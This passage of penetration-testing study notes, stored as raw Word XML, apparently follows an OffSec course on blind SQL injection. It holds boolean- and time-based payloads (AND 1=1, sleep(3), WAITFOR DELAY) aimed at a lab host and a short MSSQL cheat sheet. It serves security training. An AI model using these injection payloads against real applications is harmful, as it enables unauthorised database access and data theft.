        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The SQLi payloads we have encountered are </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in-band</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, meaning we're able to retrieve the database content of our query inside the web application. This is because in-band means the web application </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">provides the result of the query along with the application-returned value</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016E9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alternatively, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">blind</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL injections</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> describe scenarios in which database responses are never returned and behavior is inferred using either boolean- or time-based logic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016EA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As an example, generic boolean-based blind SQL injections cause the application to return different and predictable values whenever the database query returns a TRUE or FALSE result, hence the "boolean" name. These values can be reviewed within the application context.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016EB">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although "boolean-based" might not seem like a blind SQLi variant, the output used to infer results comes from the web application, not the database itself.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016EC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Time-based blind SQL injections infer the query results by instructing the database to wait for a specified amount of time. Based on the response time, the attacker can conclude if the statement is TRUE or FALSE.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016ED">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Our vulnerable application (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.50.16/blindsqli.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) includes a code portion affected by both types of blind SQL injection vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016EE">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once we have logged in with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> credentials, we'll encounter the following page:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016EF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3784600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr descr="Figure 16: Testing for Blind SQLi" id="325" name="image327.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 16: Testing for Blind SQLi" id="0" name="image327.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId469"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="378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F0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Closely reviewing the URL, we'll notice that the application takes a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter as input, defaulting to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> since this is our current logged-in user. The application then queries the user's record, returning the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Username</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password Hash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> values.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016F1">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To test for boolean-based SQLi, we can try to append the below payload to the URL:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016F2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.50.16/blindsqli.php?user=offsec' AND 1=1 -- //</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="760"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This tests for boolean-based SQLi since </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1=1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> will always be TRUE; the application will return the values only if the user is present in the database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016F4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using this syntax, we could enumerate the entire database for other usernames or even extend our SQL query to verify data in other tables.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016F5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can achieve the same result by using a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">time-based </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLi payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016F6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.50.16/blindsqli.php?user=offsec' AND IF (1=1, sleep(3),'false') -- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1082"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IF(condition, true_case, false_case) is a MySQL function that works like a ternary:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1082"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If condition is true → execute true_case</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1082"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Else → execute false_case</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016FA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this case, we appended an IF condition that will always be true inside the statement itself but will return false if the user is non-existent.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016FB">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We know the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is active, so we if paste the above URL payload into our Kali VM's browser, we'll notice that the application hangs for about three seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016FC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When dealing with blind SQL injections, it is always recommended to probe the application's behavior for both valid and erroneous responses. In this case, we aim to experiment by sending a fictitious username and verifying the response against a valid one, such as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016FD">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This attack angle can become very time-consuming, so it's often automated with tools like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, as we'll cover in the next Learning Unit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016FE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016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00">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wwl998ganxwo" w:id="190"/>
      <w:bookmarkEnd w:id="190"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to test for SQL injection for </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001701">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A great resource for this is </w:t>
      </w:r>
      <w:hyperlink r:id="rId470">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">PortSwigger SQL cheatsheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:hyperlink r:id="rId471">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">HackTricks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001702">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For these resources, make sure to put the quotation marks at the start of each command, and to put comments (--) on the end of the command to make it work</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001703">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001704">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MSSQL:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001705">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="445"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Boolean</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001706">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="445"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND 1=1--    -- page normal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001707">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="445"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND 1=2--    -- page different</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001708">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="445"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001709">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="445"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'; IF (1=1) WAITFOR DELAY '0:0:5'--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000170A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="445"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tested in Medtech .121</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000170B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
